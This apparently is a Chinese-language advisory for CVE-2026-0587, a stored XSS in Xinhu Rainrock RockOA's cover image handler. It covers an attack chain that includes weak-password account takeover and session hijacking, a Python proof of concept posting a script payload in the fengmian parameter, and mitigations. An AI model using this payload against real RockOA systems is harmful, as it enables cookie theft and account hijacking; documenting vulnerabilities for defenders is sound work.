CVE-2026-0587: Xinhu Rainrock RockOA Cover Image Handler XSS漏洞

漏洞信息

漏洞编号

CVE-2026-0587

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Xinhu Rainrock RockOA

漏洞概述

CVE-2026-0587是 Xinhu Rainrock RockOA 企业办公自动化系统中存在的一个存储型跨站脚本(XSS)安全漏洞。该漏洞影响RockOA版本至2.7.1，问题的根源在于rock_page_gong.php文件中的Cover Image Handler组件对fengmian参数的处理存在输入验证不足。当用户提交包含恶意JavaScript代码的封面图片路径时，系统未能进行充分的过滤和转义处理，导致攻击者注入的脚本代码可以被存储并在后续页面访问时执行。此漏洞虽然CVSS评分仅为3.5(低危级别)，但由于利用代码已公开，且系统可能处理敏感业务数据，攻击者可通过XSS漏洞窃取用户会话Cookie、劫持用户账号或进行钓鱼攻击。由于该漏洞需要低权限用户交互才能触发，因此主要威胁来自内部用户或社会工程学攻击。

技术细节

该漏洞存在于Xinhu Rainrock RockOA的rock_page_gong.php文件中，具体是Cover Image Handler组件对fengmian参数的处理逻辑。攻击者通过构造特殊的封面图片路径参数，在fengmian参数中注入HTML或JavaScript代码，如<script>alert(document.cookie)</script>等。由于服务端未对该参数进行严格的输入验证和输出编码，当其他用户访问包含该封面图片的页面时，恶意脚本会在其浏览器上下文中执行。漏洞利用前提条件包括：1)攻击者需要拥有系统低权限账号；2)需要诱导其他用户访问触发漏洞的页面或点击特定链接。攻击成功后，攻击者可获取受害者的会话信息、执行任意前端操作或进行进一步权限提升。由于漏洞属于存储型XSS，恶意脚本会持久化存在于系统中，影响范围更广。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用Xinhu Rainrock RockOA，并确定版本号(需<=2.7.1)

STEP 2

步骤2: 账号获取

攻击者获取系统低权限账号(PR:L要求)，可通过默认口令、弱密码或社工手段获取

STEP 3

步骤3: 构造恶意请求

攻击者构造包含XSS payload的fengmian参数，payload示例:<script>alert(document.cookie)</script>

STEP 4

步骤4: 触发存储型XSS

通过rock_page_gong.php的Cover Image Handler提交恶意封面图片路径，payload被存储在数据库中

STEP 5

步骤5: 诱导受害者

攻击者通过邮件、站内消息等方式诱导拥有高权限的目标用户访问包含恶意内容的页面

STEP 6

步骤6: 会话劫持

当受害者访问页面时，XSS payload在其浏览器执行，攻击者窃取Cookie或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2026-0587 PoC - Xinhu Rainrock RockOA XSS via fengmian parameter
# Target: rock_page_gong.php

target_url = "http://target.com/rock_page_gong.php"

# XSS payload in fengmian parameter
xss_payload = "<script>alert(document.cookie)</script>"

# Construct malicious request
params = {
    "fengmian": xss_payload,
    # Other required parameters may be needed
}

try:
    response = requests.post(target_url, data=params, timeout=10)
    print(f"Request sent to {target_url}")
    print(f"Payload: {urllib.parse.quote(xss_payload)}")
    
    # Check if the payload is reflected in response
    if xss_payload in response.text:
        print("[+] XSS vulnerability confirmed!")
    else:
        print("[-] XSS may not be present or additional parameters required")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Xinhu Rainrock RockOA <= 2.7.1

防御指南

临时缓解措施

在官方补丁发布前，可临时采取以下措施：1)限制低权限用户对封面图片上传功能的访问；2)在Web应用层增加XSS过滤中间件，对fengmian参数进行强制HTML转义；3)启用HTTPOnly和Secure属性的Cookie配置；4)增加用户操作日志审计，及时发现异常请求模式；5)对/rock_page_gong.php路径实施访问频率限制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0587
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0587
3 Details https://www.cvedetails.com/cve/CVE-2026-0587/
4 VulDB https://vuldb.com/cve/CVE-2026-0587
5 Link https://vuldb.com/?ctiid.339493
6 Link https://vuldb.com/?id.339493
7 Link https://vuldb.com/?submit.725384
8 Link https://vuldb.com/?submit.725384